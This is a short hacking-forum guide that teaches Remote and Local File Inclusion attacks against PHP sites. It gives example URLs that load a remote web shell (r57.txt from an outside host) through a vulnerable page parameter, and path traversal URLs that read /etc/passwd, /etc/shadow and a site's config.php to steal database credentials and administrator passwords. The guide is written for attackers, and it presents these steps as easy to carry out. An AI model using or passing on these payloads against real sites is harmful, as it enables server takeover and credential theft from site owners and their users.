This is a guide I wrote for my board: www.leethackers.org.
What is RFI?
RFI or also known as Remote File Inclusion can be used to execute php code from a remote host. This can be really useful. For example:
www.target.com/index.php?page=index.txt
Here we see, it takes the text of the text file: "index.txt" and places it into index.php.
It is the include() PHP Function. Sadly, no-one thought about the security while doing this. As I already said, it gets the text of index.txt and places the code into the index.php. What if we change the index.txt to a Remote server for example: www.t00ls.org/r57.txt <--- This is a web shell. So basically, it should look like this now:
www.target.com/index.php?page=www.t00ls.org/r57.txt
If the target is vulnerable, you should see a web shell on the page without injecting it or uploading a file! That easy.
What is LFI?
LFI or also known as Local File Inclusion can be used to display sensitive information from a specified file on the webhost. The concept is almost the same like RFI. The only thing that is different, the files are on localhost. For example, we have this page:
www.target.com/index.php?page=contact.php
So it shows the contact.php form. Now let us try this:
www.target.com/index.php?page=../../../etc/passwd
If you get a page with users, then this page is vulnerable to LFI. The passwords are displayed as 'x''s though. Try to check the 'shadow' File. So do this:
www.target.com/index.php?page=../../../etc/shadow
This file is normally not readable for the users. It is only readable for 'root'.
What you could try, is getting the config.php file that is mostly located in the include folder. so:
www.target.com/index.php?page=./include/config.php
If you have got the details for the DB (server, username, password, database) you can connect to it and get the administrator password from the users or w.e table.
Hope this small explaination helped you a bit!